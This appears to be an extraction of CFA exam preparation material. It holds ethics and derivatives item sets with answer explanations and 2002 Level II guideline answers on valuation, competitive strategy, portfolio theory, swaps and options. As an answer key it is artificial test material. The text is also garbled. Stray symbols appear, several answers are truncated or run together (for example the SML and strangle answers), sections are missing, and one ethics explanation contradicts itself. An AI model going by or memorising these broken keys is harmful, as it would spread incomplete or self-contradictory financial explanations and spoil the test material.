other employment.
2. D is correct. Cassella may not solicit current or potential clients of the bank prior to her leaving
the bank whether in a social setting or any other setting. The reduced fee potential is not a
criterion for allowing her to solicit them. It does not matter whether the clients leave or not; the
act of soliciting them would be a violation.
3. C is correct. Cassella may solicit rejected prospects while she is still employed by the bank
because they do not represent competition with the bank. She must do this on her own time
however, so that she fullfills her duty to her current employer. Prior to leaving the bank, she may
not solicit potential clients, but once she leaves she is free to contact them. The reduced fee
potential is not a criterion for allowing her to solicit the potential clients as long as she works for
the bank. It does not matter whether the bank eventually rejects the potential clients; the act of
soliciting them would be a violation as long as they have not been rejected.
4. B is correct. Cassella may not remove the sample marketing presentations and research materials
from the bank. The fact that the materials are never used to benefit her new firm does not change
the fact that they are the property of the bank and may not be removed. If Cassella had written
permission, she could remove the materials without violation of the Standards. It does not matter
whether the materials contain confidential or nonpublic information or not; the act of removing
them would be a violation. It does not matter whether the materials are factual information or not;
they are the property of the bank because they were gathered on the bank’s time.
5. B is correct. Cassella may not remove the computer model and the rejected investment ideas from
the bank. The fact that she developed them does not change the fact that they are the property of
the bank and may not be removed. They are not her property and she may not use them.
6. A is correct. Cassella may not remove the compliance procedures from the bank. They are the
property of the bank and may not be removed. Their source and use do not change the situation.
Item Set #2 (Derivatives)
Joel Franklin is a portfolio manager responsible for derivatives. Franklin observes European-style put
options and call options on Abaco Ltd. common stock with the same strike price and time to
expiration. Selected information relevant to Abaco Ltd. stock and options is shown in Exhibit 1.
Exhibit 1
Abaco Ltd. Securities Selected Data
Closing price of Abaco common stock $43.00
Put and call option exercise price $45.00
Time to expiration One year
Price of the European-style put option $4.00
Price of the European-style call option
One-year risk-free rate, compounded
continuously 5.50%
Samantha Crowe, a colleague of Franklin, believes that Abaco stock is overpriced and she decides to
sell short the stock. However, her broker informs her that an adequate inventory of the stock may not
be available to sell short.
1. Based on a put-call parity, the value of the European-style call option is closest to:
A. $0.00.
B. $2.00.
C. $4.35.
D. $4.41.
2. If the volatility of Abaco’s stock price decreases, what is most likely to happen to the values of
the related call and put?
A. Both the call and the put will decrease in value.
B. Both the call and the put will increase in value.
C. The value of the call will increase while the value of the put will decrease.
D. The value of the call will decrease while the value of the put will increase.
3. Franklin considers buying a European-style put option with an exercise price of $40.00 and one
year to expiration. Based on the information provided in Exhibit 1 about the options with an
exercise price of $45.00, what should be the price of a put option with an exercise price of
$40.00?
A. Less than or equal to $1.00.
B. Greater than $1.00 but less than or equal to $3.00.
C. Greater than $3.00 but less than or equal to $9.00.
D. Greater than $9.00.
4. Which of the following actions, if executed by Crowe at the correct exercise prices, times to
expiration, and face values, will accomplish the same payoff as the original short sale strategy?
A. Buy a pure discount risk-free bond, buy a put option, buy a call option.
B. Short a pure discount risk-free bond, buy a put option, buy a call option.
C. Buy a pure discount risk-free bond, sell a put option, buy a call option.
D. Short a pure discount risk-free bond, buy a put option, sell a call option.
5. The Chief Economist at Franklin’s firm is forecasting a substantial decline in interest rates. To
help gain from this forecast while assuming limited risk, Franklin should take which of the
following actions with regard to the European-style options in Exhibit 1?
A. Buy the call option.
B. Buy the put option.
C. Sell the call option.
D. Sell the put option.
6. Franklin considers selling the European-style put option described in Exhibit 1. Ignoring time
value of money and given current prices, the maximum possible loss from this strategy is:
A. $39.00.
B. $41.00.
C. $45.00.
D. Unlimited.
Item Set #2 Guideline Answers
1. D is correct. c = S + p – Xe–r(T– t)
$4.408 = $43 + 4.00 – 45.00e–0.055×1
2. A is correct. The volatility of the stock is directly related to the price of the call option and the put
option. So a decrease in volatility will cause the price of both the call and the put to decrease.
3. B is correct. The price of the put option is its time value plus intrinsic value. The time value
should be about $2.00 (from the $45.00 exercise price) and the intrinsic value will be $0.00. This
will place the price of the put at about $2.00, depending upon the volatility of Abaco stock. Both
the options (exercise price of $40 and $45) have the same time to expiration and similar time
values, and both options are European.
4. D is correct. The put-call parity can be written as c = S + p – Xe–r(T– t)
This equation can be re-written as –S = – Xe–r(T– t) + p – c
The left-hand side can be stated as shorting a stock, and the right hand side of the equation can be
stated shorting a pure discount risk free bond, buying a put, and shorting a call.
5. B is correct. According to the Black-Scholes Option Pricing Model, the change in risk-free
interest rate (‘rho’) is directly related to the value of a call option and inversely related to the
value of a put option. A decrease in interest rates should cause the price of the call to fall and the
price of the put to increase. Buying a put and selling a call will both result in gains, but selling a
naked call is an unlimited risk strategy. Therefore, buying a put will be the most appropriate
choice.
6. B is correct because the upper boundary for a put option price is when the stock is worthless (S =
0). Here, the put holder will have the right to sell the stock for $45, when it is worth nothing in the
market. The put writer will lose ($45–$4) = $41.
-
+
+
+
=
.
where FCFF = EBIT × (1 – t) + Depr – (Cap Ex) – .wc
2002 Level II Guideline Answers
Morning Session - Page 2
FCFF for DCom 2001 2002 2003 2004
EBIT ($69.68) ($47.51) ($10.52)
After-tax rate = (1 – t) 0.7 0.7 0.7
Depreciation & Amortization = Depr $129.00 $136.50 $144.00
Less Capital Expenditures = (Cap Ex) $400.00 $50.00 $50.00
Less Change in Working
Capital = .wc $5.19 ($4.32) ($6.47)
Free cash flows to the firm = FCFF ($324.97) $57.56 $93.11 $107.08*
Growth Rate = g 50% 50% 50% 15%
Terminal Value2003 = FCFF2004 / (WACC – g2004) $5,354.00
PV of FCFF @ 17%**
PV of terminal value at 17%
($277.75) $42.05 $58.14
$3,342.88
DCom’s total firm value at
end of year 2000 $ 3,165.32 million
*FCFF2004 = FCFF2003 × (1 + g2004) = $93.11 × 1.15
**WACC = 17%
B. The total firm value as determined by the FCFF model is not the appropriate measure
of
value to estimate the contribution DCom should make to the market price of Jones Group
equity. To address the effect of DCom on Jones Group’s value, the value of DCom must
first
be apportioned between bondholders and equity holders, which the FCFF approach does
not
do. Because DCom has a positive amount of debt outstanding, using the total firm value
as
determined by FCFF without adjustment for DCom’s debt will overstate DCom’s
expected
contribution to the value of Jones Group’s equity.
The FCFF model could be used in this situation, but only if the market value of DCom
debt
is deducted from the value computed using the model. Deducting the market value of the
debt effectively apportions the value of DCom between the bondholders and equity
holders.
2002 Level II Guideline Answers
Morning Session - Page 3
LEVEL II, QUESTION 2
Topic: Asset Valuation
Minutes: 16
Reading References:
“Competitive Strategy: The Core Concepts,” Michael E. Porter, Competitive Advantage:
Creating and Sustaining Superior Performance (The Free Press, 1985), 2002 CFA Level
II
Candidate Readings
Purpose:
To test the candidate’s ability to identify the competitive factors in an industry that
influence the
performance of companies in that industry.
LOS: The candidate should be able to
“Competitive Strategy: The Core Concepts” (Study Session 9)
a) analyze the competitive advantage and competitive strategy of a company and the
competitive forces that affect the profitability of a company;
b) analyze basic types of competitive advantage that a company can possess and the
generic
strategies for achieving a competitive advantage.
Guideline Answer:
A.
Identify the competitive
strategy being used by
DCom
Differentiation Focus
1. The company seeks to focus on a segment or group of
segments within an industry by tailoring its strategy to serve
that segment/group to the exclusion of others.
2. The company seeks to achieve a competitive advantage in a
target segment even though it does not possess a competitive
advantage overall.
Describe two characteristics
of that strategy
3. The company does not seek to compete on price but on
tailored product offerings. As a result the company’s product
usually commands a price premium.
Identify two of Anderson’s
responses that support
that strategy
(circle two numbers)
Response 1 identifies the focused target market.
Response 4 identifies the specific method of differentiation
(network reliability).
2002 Level II Guideline Answers
Morning Session - Page 4
B.
Identify the competitive
strategy most likely to be
used by traditional
telephone companies in the
long-haul data
communications industry
Cost Leadership
1. A company decides to become the low-cost provider in the
industry.
2. A company seeks to serve a broad scope of customers with
a generic product offering.
Describe two characteristics
of that strategy
3. A company adopting this strategy believes that there is little
room to differentiate its products or services from those of its
competitors on any basis other than cost.
Identify two of Blume’s
observations that support
that strategy
(circle two numbers)
Observation 3 identifies extremely low cost base as a source
of potential competitive advantage for established service
providers.
Observation 5 identifies removal of regulation as a means to
allow entry by established service providers with technology
and infrastructure in place to serve the broad market.
2002 Level II Guideline Answers
Morning Session - Page 5
LEVEL II, QUESTION 3
Topic: Asset Valuation
Minutes: 11
Reading Reference:
Analysis for Financial Management, 6th edition, Robert C. Higgins (Irwin, 2000)
B. “Managing Growth,” Ch. 4
Purpose:
To test the candidate’s ability to calculate the sustainable growth rate and to determine
what
corrective actions should be taken in the event that the sustainable growth rate diverges
from the
actual growth rate.
LOS: The candidate should be able to
“Managing Growth” (Study Session 8)
a) explain the concept of sustainable growth and identify its determinants;
b) calculate the sustainable growth of a company, given balance sheet and income
statement
data;
c) describe the courses of action that a company could take when actual growth exceeds
sustainable growth and the possible effects of those actions on the company;
d) describe the courses of action that a company could take when sustainable growth
exceeds
actual growth and the possible effects of those actions on the company.
Guideline Answer:
A.
Profit Margin = Net income / Sales = P
= $122.69 / $1,833.45 = 0.066918
Retention Rate = 1 – (Dividends / Net income) = R
= 1 – $88.18 / $122.69 = 0.281278
Asset Turnover = Sales / Assets = A
= $1,833.45 / $3,100.85 = 0.591273
Financial Leverage = Assets / Equity = T
T = $3,100.85 / $1,475.16 = 2.102043
T* = $3,100.85 / $1,440.64 = 2.152411
g = P × R × A × T = 2.35%
g* = P × R × A × T* = 2.40%
* Calculated with beginning of period Equity
2002 Level II Guideline Answers
Morning Session - Page 6
Alternate calculation 1:
Return on Equity = Net income / Average Equity = ROE
= $122.69 / $1,457.90* = 0.084155
Retention Rate = 1 – (Dividends / Net income) = R
= 1– ($88.18 / $122.69) = 0.281278
g = ROE × R = 2.37%
*Average equity = ($1,440.64 + $1,475.16) / 2
Alternate calculation 2:
g = (Shareholders’ Equity2003 / Shareholders’ Equity2002) – 1
= ($1,475.16 / $1,440.64) – 1 = 1.02396 – 1 = 2.40%
B. To remain on its desired growth curve, Jones Group management will need to make
one or
more of the following policy changes:
• issue new equity
• increase debt ratio (leverage)
• reduce payout ratio (increase retention rate)
• generate cash through profitable pruning of business units
• increase prices
• reduce costs through outsourcing or other means (increase operating efficiency)
• merge with another company that can provide excess cash flow or increased debt
capacity
C.
i. Profit margin: In the short-term, excess capacity will result in low profit margins. Until
the excess capacity is utilized, the marginal revenues that DCom will generate as revenue
growth continues will have a marginal cost close to zero. This will cause the profit
margin of Jones Group to increase, which will result in a higher sustainable growth rate.
ii. Asset turnover: Because of the excess capacity, DCom’s asset turnover is very low. As
revenue growth continues and capital expenditures decrease, asset turnover will increase,
which will result in a higher sustainable growth rate for Jones Group.
2002 Level II Guideline Answers
Morning Session - Page 7
LEVEL II, QUESTION 4
Topic: Asset Valuation
Minutes: 11
Reading References:
“Valuing Zero-Income Stocks: A Practical Approach,” Barney Wilson, Practical Issues in
Equity Analysis (AIMR, 2000), 2002 CFA Level II Candidate Readings
Purpose:
To test the candidate’s ability to: 1) understand when a bimodal distribution may be a
better
representation of the distribution of expected revenues for a high growth/high risk growth
company, such as an Internet company, and 2) recognize the importance of, and
difficulties in,
establishing discount, growth, and fade rates when valuing high growth/high risk
companies.
LOS: The candidate should be able to
“Valuing Zero-Income Stocks: A Practical Approach” (Study Session 12)
a) explain why a bimodal distribution better characterizes the prospects of a high
growth/high
risk company, such as an Internet related company;
b) discuss why it is difficult to apply a traditional present value model to the valuation of
high
growth/high risk companies because of discount rate and fade rate problems;
c) describe how a multiple-scenario DCF method combined with reality checks such as
priceto-
earnings ratios and market capitalization can improve an analyst’s ability to value
highgrowth/
high risk companies.
Guideline Answer:
A. The shape of the probability distribution in Exhibit 4-1 is bimodal. Given the bimodal
distribution of revenue growth rates, using the expected value of the revenue growth rate
to
value DCom may not be appropriate because the expected value:
• will not be the most likely outcome, and
• is not a plausible outcome for a single iteration of a bimodal scenario.
B. Beyond Tooley’s statement that scenario analysis is only useful for studying various
alternative outcomes, Richardson’s scenario analysis is also useful in analyzing DCom,
because:
• it can help Richardson identify the key drivers of DCom’s success or failure, such as
revenue growth and market share, and
• as events occur that affect DCom, Richardson can evaluate how these events affect the
probabilities assigned to the different scenarios and hence the probability of the
company’s success or failure.
2002 Level II Guideline Answers
Morning Session - Page 8
C. If the fade rate (the rate at which high or supernormal growth slows) is lower than
forecasted,
then higher earnings growth will be sustained longer into the future, leading to higher
valuations. Specifically, revenues will be higher than forecasted, resulting in higher
profitability (all else equal) and higher valuations.
2002 Level II Guideline Answers
Morning Session - Page 9
LEVEL II, QUESTION 5
Topic: Asset Valuation
Minutes: 12
Reading References:
1. Investment Analysis and Portfolio Management, 6th edition, Frank K. Reilly and Keith
C.
Brown (Dryden, 2000)
A. “Analysis of Financial Statements,” Ch. 12
2. “General Principles of Credit Analysis,” Level II, Ch. 9, Fixed Income Analysis for the
Chartered Financial Analyst Program, Frank J. Fabozzi, (Frank J. Fabozzi Associates,
2000)
3. “Credit Analysis for Corporate Bonds,” Jane Tripp Howe, Ch. 20, pp. 371–392, The
Handbook of Fixed Income Securities, 5th edition, Frank J. Fabozzi, ed. (Irwin, 1997),
2002
CFA Level II Candidate Readings
Purpose:
To test the candidate’s understanding of corporate credit analysis for a bond issuer by
discussing
characteristics and issues with respect to financing rather than by calculating analytical
data.
LOS: The candidate should be able to
“Analysis of Financial Statements” (Study Session 9)
g) compute return on equity (ROE) using the duPont system and the extended duPont
system;
h) use financial ratios for comparative analysis of a company over time and relative to its
industry or to the market.
“General Principles of Credit Analysis” (Study Session 14)
d) discuss sources of liquidity for a company and the importance of these sources in the
credit
analysis process;
h) discuss why and how cash flow from operations is used to assess the ability of an
issuer to
service its debt obligations and to identify the financial flexibility of a company;
j) explain the typical elements of the debt structure of a high-yield issuer, the
interrelationships
among these elements, and the impact of these elements on the risk position of the lender.
“Credit Analysis for Corporate Bonds” (Study Session 14)
c) analyze the components of a company’s return on equity (ROE) and explain the
importance
of expected earnings growth and ROE in determining credit quality.
Guideline Answer:
A. There are several effects on Jones Group’s creditworthiness if the one-year bank loan
is
used:
1. The bank loan may have a priority lien on Jones Group’s assets, making most existing
or
new-issue “senior” notes less secure. Less security implies a higher cost of funds in the
future.
2. The short one-year maturity of the bank loan subjects Jones Group to a refunding time
horizon that may be shorter than management considers optimal.
2002 Level II Guideline Answers
Morning Session - Page 10
3. The variable interest rate on the bank loan subjects Jones Group to interest rate risk and
volatility at a time when management may prefer locking in the cost of funds.
4. Profits can be positively or negatively affected depending on whether rates are lower or
higher on the bank debt versus maturing debt. This will affect the earning capacity of the
firm, as well as financial flexibility and therefore creditworthiness.
5. Financial flexibility and hence creditworthiness can be positively or negatively
affected
depending on whether and how covenants on bank debt differ from covenants on
maturing debt.
B. There are several issues relating to the sale of Jones Group assets:
1. There is a time constraint, in that Jones Group needs to execute the sale of assets prior
to
the debt maturity to ensure that the funds will be available.
2. There may be a loss of control over operating assets required for the securitization for
the
asset-backed securities.
3. The asset sale may involve a lower cost of capital than other sources of financing.
4. Total cost of issuance may differ substantially, higher or lower, than other sources of
financing.
5. Covenants on existing debt may limit/prohibit asset sales.
6. Effects of covenants on existing debt with respect to an asset sale, even absent
violation,
and on the securitized debt may adversely affect financial flexibility.
7. Any over collateralization required by the rating agency to support securitization may
potentially result in an insufficient amount of funds to refinance the maturing debt.
C. Considering the components of after-tax ROE, there are several possible explanations
for
after-tax ROE remaining constant while operating income was declining:
1. Decreasing operating income could have been offset by an increase in non-operating
income (i.e., from discontinued operations, extraordinary gains or income, gains from
changes in accounting policies) because both are components of profit margin (net
income/sales).
2. Another offset to decreasing operating income could have been declining interest rates
on
any interest rate obligations, which would have decreased interest expense and allowed
pre-tax margins to remain stable.
3. Leverage could have increased as a result of a decline in equity from: a) writing down
an
equity investment, b) stock repurchases, c) losses, or d) selling new debt. The effect of
the increased leverage could have offset a decline in operating income.
4. An increase in asset turnover would also offset the decline in operating income. Asset
turnover could increase as a result of the sales growth rate exceeding the asset growth
rate, or from the sale or write-off of assets.
5. If the effective tax rate declined, the resulting increase in earnings after tax could offset
a
decline in operating income. The decline in effective tax rates could result from increased
tax credits, the use of tax loss carry forwards, or a decline in the statutory tax rate.
2002 Level II Guideline Answers
Morning Session - Page 11
LEVEL II, QUESTION 6
Topic: Asset Valuation
Minutes: 18
Reading References:
Investment Valuation: Tools and Techniques for Determining the Value of Any Asset,
Aswath
Damodaran (Wiley, 1996)
A. “Dividend Discount Models,” Ch. 10
Purpose:
To test the candidate’s ability to calculate a two-stage DDM value for an established
company’s
equity.
LOS: The candidate should be able to
“Dividend Discount Models” (Study Session 10)
a) explain and calculate the value of a company’s equity using the dividend discount
model
(DDM), the Gordon growth model, the two-stage DDM, the H model, and the three-stage
DDM.
Guideline Answer:
Because expected dividends exhibit two stages, a two-stage dividend discount model is
appropriate. In the first stage, which includes 2002 and 2003, dividends are expected to
be level
at $0.74 which represents a 60 percent reduction from the 2001 dividend of $1.85. In the
second
stage, beginning in 2004, the dividend will be restored to its former $1.85 level and will
grow at
a constant 8 percent rate thereafter.
2002 2003 2004 Terminal
Value
Projected Dividend = Dn $0.74 $0.74 $1.85 $2.00
Dividend Growth Rate = g 8%
Required Rate of Return = r 11% 11% 11% 11%
Terminal Value = (D2004 ×
(1 + g)) / (r2004 – g)
$66.67
Present Value of Dividends @ 11% $0.67 $0.60 $1.35
Present Value of Terminal Value @ 11% $48.75
Share price based on DDM $51.37
2002 Level II Guideline Answers
Morning Session - Page 12
LEVEL II, QUESTION 7
Topic: Asset Valuation
Minutes: 12
Reading Reference:
Valuing a Business: The Analysis and Appraisal of Closely Held Companies, 3rd edition,
Shannon P. Pratt, Robert F. Reilly, and Robert P. Schweihs (Irwin 1995)
A. “Minority Interest Discounts, Control Premiums, and Other Discounts and Premiums,”
Ch.
14, pp. 300-303 and 316-326
B. “Discounts for Lack of Marketability,” Ch. 15, pp. 331-334, 342-359
Purpose:
To test the candidate’s understanding of minority and/or marketability discounts.
LOS: The candidate should be able to
“Minority Interest Discounts, Control Premiums, and Other Discounts and Premiums”
(Study
Session 11)
a) describe the concept and importance of control;
d) discuss the impact of state statute provisions on minority versus control value;
e) discuss the top down, horizontal, and bottom up approaches for valuing minority
interests;
f) discuss the market evidence with respect to control premiums and minority discounts.
“Discounts for Lack of Marketability” (Study Session 11)
d) describe the major factors affecting the discount for lack of marketability.
2002 Level II Guideline Answers
Morning Session - Page 13
Guideline Answer:
Statement
Indicate
whether each
of
Rutherford’s
statements is
correct or
incorrect
(circle one)
Justify your response with one reason
(if incorrect)
1. A common approach to
valuing minority interests uses
a “bottom up” valuation
method, which is similar to
valuing publicly traded
common stocks using the
dividend discount model.
Correct
2. Statutes enacted by some
sovereign entities that increase
the rights of minority
shareholders usually serve to
increase the magnitude of the
minority discount.
Incorrect
Sovereign entity statute provisions that
increase the power of the minority holder will
serve to reduce the magnitude of the discount
that must be taken for a minority interest,
because such provisions effectively reduce the
differences in status between controlling and
minority interests.
3. Of the “top down,”
“horizontal,” or “bottom up”
methods of valuing minority
interests, both the “top down”
and “horizontal” methods
require an estimate of value
for the total enterprise.
Incorrect
Only the “top down” method requires that the
entire enterprise be valued. The other methods
only require that the minority interest be
valued.
4. In general, market control
premiums are lower for
strategic acquisitions than for
financial acquisitions.
Incorrect
Entities that acquire control for strategic
reasons should be, and typically are, able to
justify a higher premium than entities that
acquire control for purely financial reasons.
This is because the synergies that attach to a
strategic acquisition are expected to result in
higher returns to the acquiring entity than the
returns that are to be obtained from a purely
financial transaction.
2002 Level II Guideline Answers
Morning Session - Page 14
LEVEL II, QUESTION 8
Topic: Portfolio Management
Minutes: 7
Reading Reference:
Investment Analysis and Portfolio Management, 6th edition, Frank K. Reilly and Keith C.
Brown
(Dryden, 2000)
B. “An Introduction to Portfolio Management,” Ch. 8
PURPOSE
To test the candidate’s ability to: 1) identify and briefly describe several measures of risk,
and 2)
identify which measures are appropriate to measure the risk of a stand-alone asset versus
a
portfolio.
LOS: The candidate should be able to
“An Introduction to Portfolio Management” (Study Session 20)
b) identify several measures of risk and explain the circumstances in which their use
might be
appropriate in both stand-alone and portfolio contexts.
Guideline Answer:
A. The measure of risk that is most consistent with the client’s statement is “range of
returns.” A
major weakness of this measure is that it focuses on the extremes of the distribution,
attaching excessive importance to these values. The range of returns measure ignores the
shape of the distribution with respect to both expected value and volatility. In addition,
this
measure does not utilize a benchmark or market portfolio for comparison purposes to
assess
overall portfolio risk.
B. Portfolio A is more likely to achieve the client’s objective.
The client is risk averse and has strongly stated a minimum required rate of return or
“floor”
relative to achieving his retirement goals. Thus, the risk measure for assessing which
portfolio is most appropriate for the client is one that focuses on downside risk. Exhibit 8-
1
shows that portfolio A has a lower probability (27.54 percent) of failing to meet the
client’s
minimum required rate of return (8 percent average annual return) over a ten-year
holding
period, compared to portfolio B’s 45.92 percent probability of failing to earn 8 percent.
The
one-year holding period probabilities are not appropriate measures given the longer-term
nature of the client’s objective.
2002 Level II Guideline Answers
Morning Session - Page 15
LEVEL II, QUESTION 9
Topic: Portfolio Management
Minutes: 15
Reading References:
Investment Analysis and Portfolio Management, 6th edition, Frank K. Reilly and Keith C.
Brown
(Dryden, 2000)
A. “Efficient Capital Markets,” Ch. 7
C. “An Introduction to Asset Pricing Models,” Ch. 9
Purpose:
To test the candidate’s ability to: 1) to distinguish between systematic and unsystematic
risk, 2)
describe the role of the market portfolio, and 3) use the SML to determine whether a
security is
undervalued, overvalued, or properly valued.
LOS: The candidate should be able to
“Efficient Capital Markets” (Study Session 20)
a) describe the set of assumptions that imply an efficient capital market.
“An Introduction to Asset Pricing Models” (Study Session 20)
a) distinguish between the original capital market theory assumptions and the revised
assumptions that underlie the capital asset pricing model (CAPM);;
g) calculate, based on the SML, the expected return for an asset;
i) determine, based on the SML, whether a security is undervalued, overvalued, or
properly
valued.
Guideline Answer:
A. Agree; Regan’s conclusion is correct. By definition the market portfolio lies on the
capital
market line (CML). Under the assumptions of capital market theory, all portfolios on the
CML dominate, in a risk-return sense, portfolios that lie on the Markowitz efficient
frontier
because, given that leverage is allowed, the CML creates a portfolio possibility line that
is
higher than all points on the efficient frontier except for the market portfolio, which is
Rainbow’s portfolio. Because Eagle’s portfolio lies on the Markowitz efficient frontier at
a
point other than the market portfolio, Rainbow’s portfolio dominates Eagle’s portfolio.
2002 Level II Guideline Answers
Morning Session - Page 16
B. Unsystematic risk is the unique risk of individual stocks in a portfolio that is
diversified away
by holding a well-diversified portfolio. Total risk is composed of systematic (market) risk
and unsystematic (firm-specific) risk.
Disagree; Wilson’s remark is incorrect. Because both portfolios lie on the Markowitz
efficient frontier, neither Eagle nor Rainbow has any unsystematic risk. Therefore,
unsystematic risk does not explain the different expected returns. The determining factor
is
that Rainbow lies on the (straight) line (the CML) connecting the risk-free asset and the
market portfolio (Rainbow), at the point of tangency to the Markowitz efficient frontier
having the highest available amount of return per unit of risk. Wilson’s remark is also
countered by the fact that because unsystematic risk can be eliminated by diversification,
the
expected return to bearing it is zero. This happens as a result of well-diversified investors
bidding the price of every asset up to the point at which only systematic risk earns a
positive
return (unsystematic risk earns no return).
C.
Common Stock Calculate the required rate of return
Indicate whether each
stock is undervalued,
fairly valued, or
overvalued
(circle one)
Furhman Labs
E(R) = Rf + Beta × (Rm – Rf)
= 5.0% + 1.5 × (11.5% – 5.0%)
= 14.75%
Overvalued*
Garten Testing
E(R) = Rf + Beta × (Rm – Rf)
= 5.0% + 0.8 × (11.5% – 5.0%)
= 10.20%
Undervalued*
*Supporting calculations:
Furhman: Forecast – Required = 13.25% – 14.75% = –1.50% (Overvalued)
Garten: Forecast – Required = 11.25% – 10.20% = 1.05% (Undervalued)
If the forecast return is less (greater) than the required rate of return, the security is
overvalued
(undervalued).
2002 Level II Guideline Answers
Morning Session - Page 17
LEVEL II, QUESTION 10
Topic: Portfolio Management
Minutes: 6
Reading Reference:
Investment Analysis and Portfolio Management, 6th edition, Frank K. Reilly and Keith C.
Brown
(Dryden, 2000)
C. “An Introduction to Asset Pricing Models,” Ch. 9
Purpose:
To test the candidate’s ability to discuss the security market line (SML) and explain how
the
SML differs from the CML.
LOS: The candidate should be able to
“An Introduction to Asset Pricing Models” (Study Session 20);
f) discuss the security market line (SML) and how it differs from the CML.
Guideline Answer:.
B. McKay should substitute low beta stocks for high beta stocks to reduce the overall
beta of
York’s portfolio.
By reducing the overall portfolio beta, McKay will reduce the systematic risk of the
portfolio
and therefore its., lending
part
of the portfolio).
2002 Level II Guideline Answers
Morning Session - Page 18
LEVEL II, QUESTION 11
Topic: Portfolio Management
Minutes: 6
Reading Reference:
Investment Analysis and Portfolio Management, 6th edition, Frank K. Reilly and Keith C.
Brown
(Dryden, 2000)
D. “Extensions and Testing of Asset Pricing Theories,” Ch. 10
Purpose:
To test the candidate’s understanding of Roll’s concept of benchmark error.
LOS: The candidate should be able to
“Extensions and Testing of Asset Pricing Theories” (Study Session 20)
d) discuss why Roll’s critique of the CAPM and Shanken’s challenge to the APT cause
many
observers to consider the models to be untestable;
e) describe the concept of benchmark error.
Guideline Answer:
The effects of an incorrectly specified market proxy are that:
i. The beta of Black’s portfolio is likely be underestimated (too low) relative to the beta
calculated based on the “true” market portfolio. This is because the Dow Jones Industrial
Average (DJIA) and other market proxies are likely to have less diversification and a
higher
variance of returns than the “true” market portfolio as specified by the capital asset
model. Consequently, beta computed using an overstated variance (Betaportfolio =
Covarianceportfolio, market proxy / Variancemarket proxy) will be underestimated.
ii. The slope of the security market line (SML), i.e., the market risk premium, is likely to
be
underestimated relative to the “true” market portfolio because the “true” market portfolio
is
likely to be more efficient—plotting on a higher return point for the same risk—than the
DJIA and similarly misspecified market proxies. Consequently, the proxy-based SML
would
offer less expected return per unit of risk.
2002 Level II Guideline Answers
Morning Session - Page 19
LEVEL II, QUESTION 12
Topic: Asset Valuation
Minutes: 9
Reading Reference:
Futures, Options & Swaps, 3rd edition, Robert W. Kolb (Blackwell, 1999)
A. “The Swaps Market: Introduction,” Ch. 20, pp. 608-625 and pp. 632-643
B. “ The Swaps Market: Refinements,” Ch. 21, pp. 648-671
Purpose:
To test the candidate’s: 1) understanding of a plain interest rate swap and how it can be
used to
efficiently manage the balance sheet of a corporation, and 2) ability to replicate a plain
vanilla
swap with two bonds.
LOS: The candidate should be able to
“The Swaps Market: Introduction” (Study Session 17)
a) discuss the characteristics of and motivations for swap contracts and differentiate swap
contracts from futures contracts, especially with respect to payment date versus
expiration
date;
b) diagram (with a box and arrow diagram) and explain the cash flows between the
parties to a
plain vanilla swap contract, including situations in which an intermediary participates;
e) illustrate the appropriate cash flow diagram for a swap and calculate the net
borrowing/lending costs for the two swap counterparties.
“The Swaps Market: Refinements” (Study Session 17)
a) demonstrate how swap agreements can be viewed as a combination of capital market
instruments.
Guideline Answer:
A. The instruments needed by Scott are a fixed-coupon bond and a floating rate note
(FRN).
The transactions required are to:
• issue a fixed-coupon bond with a maturity of three years and a notional amount of $25
million, and
• buy a $25 million FRN of the same maturity that pays one-year LIBOR +
2002 Level II Guideline Answers
Morning Session - Page 20
positive or negative to Rone. Thus, the bond transactions are financially equivalent to a
plain
vanilla pay-fixed interest rate swap.
2002 Level II Guideline Answers
Morning Session - Page 21
LEVEL II, QUESTION 13
Topic: Asset Valuation
Minutes: 17
Reading Reference:
Futures, Options & Swaps, 3rd edition, Robert W. Kolb (Blackwell, 1999)
A. “Option Payoffs and Option Strategies,” Ch. 11, pp. 316-346
C. “Option Sensitivities and Option Hedging,” Ch. 14, pp. 422-437
Purpose:
To test the candidate’s: 1) understanding of different option combinations, specifically
strangle
strategies, and 2) ability to relate delta and gamma to the price of a call option.
LOS: The candidate should be able to
“Option Payoffs and Option Strategies” (Study Session 18)
b) calculate the cost of the following option-trading strategies: straddle, strangle, bull and
bear
spreads, and butterfly spread;
c) determine, using a profit/loss diagram, the profit or loss of an option-trading strategy
for any
asset value.
“Option Sensitivities and Option Hedging,” (Study Session 18)
c) calculate the change in option price, given delta and the change in asset price;
d) calculate delta, given the change in option price and the change in asset price;
k) relate gamma to changes in an option’s delta and stock price.
Guideline Answer:
A. Donie should choose the long strangle strategy.
A long strangle option strategy consists of buying a put and a call with the same
expiration
date and the same underlying asset. In a strangle strategy, the call has an exercise price
above
the stock price and the put has an exercise price below the stock price. An investor who
buys
(goes long) a strangle expects that the price of the underlying asset (TRT in this case) will
either move substantially below the exercise price on the put or above the exercise price
on
the call. With respect to TRT, the long strangle investor buys both the put and call options
for
a total cost of $9.00, and will experience large profits if the stock price moves more than
$9.00 above the call exercise price or $9.00 below the put exercise price. This strategy
would
enable Donie’s client to profit from a large move in the stock price, either up or down, in
reaction to the expected court decision.
2002 Level II Guideline Answers
Morning Session - Page.00 – $9.00 = $46.00), and the call
will just cover costs if the stock price finishes $9.00 above the call exercise price ($60.00
+ $9.00 = $69.00).
The following diagram provides support for the answers above.
Long strangle
-10
-8
-6
-4
-2
0
2
4
6
8
10
12
35 40 45 50 55 60 65 70 75 80
Stock Price($)
Profit/Loss($)
C. The delta for a call option is always positive, so the value of the call option in Exhibit
13-1
will increase if the stock price increases. Specifically, if the stock price increases by
$1.00,
the price of the call will increase by approximately $0.63:
.Price call = 0.6250 × $1.00) = $0.625 increase
D. Gamma is the second derivative of the option price with respect to the stock price and
measures how delta changes with changes in the underlying stock price.
The gamma for the put option in Exhibit 13-1 would increase if the stock price decreases
to
$57.00. Gamma is relatively small when an option is out-of-the-money but becomes
larger as
the option approaches near-the-money, which is the case as the underlying asset value
moves
down toward the put option’s $55 exercise price.
$46.0 $69.0
2002 Level II Guideline Answers
Morning Session - Page 23
LEVEL II, QUESTION 14
Topic: Asset Valuation
Minutes: 12
Reading Reference:
Futures, Options & Swaps, 3rd edition, Robert W. Kolb (Blackwell, 1999)
D. “Foreign Exchange Futures,” Ch. 9, pp. 261–266
Purpose:
To test the candidate’s ability to calculate the value of, and determine if there is an
arbitrage
opportunity available in, a currency futures contract.
LOS: The candidate should be able to:
“Foreign Exchange Futures” (Study Session 17)
b) compute, using the cost-of-carry model, the theoretical futures price and determine
whether
an arbitrage profit exists;
d) compute the profits from an arbitrage strategy.
Guideline Answer:
A. The theoretical futures contract price is ¥122.0645, calculated as follows:
